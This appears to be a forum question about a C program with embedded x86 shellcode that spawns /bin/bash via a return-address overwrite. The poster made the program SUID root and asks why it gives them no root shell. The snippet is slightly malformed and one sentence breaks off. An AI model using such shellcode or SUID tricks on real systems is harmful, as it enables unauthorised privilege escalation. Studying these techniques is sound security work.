I have made a script in C which spawns a shell. Here it is
char shellcode = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
I have made it as root & set it as suid by
Now i have copied this file to a normal user's location & executed as normal user. So i have expected a root shell for the normal user but i got the bash shell as a normal user.
I dont understand why i am not getting root shell ?
According to the definition of SUID, it is
If the SUID bit is set for any application then your user ID would be set as that of the owner of application/file rather than the current user, while running that application.
So what wrong i am doing ?
My OS info
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux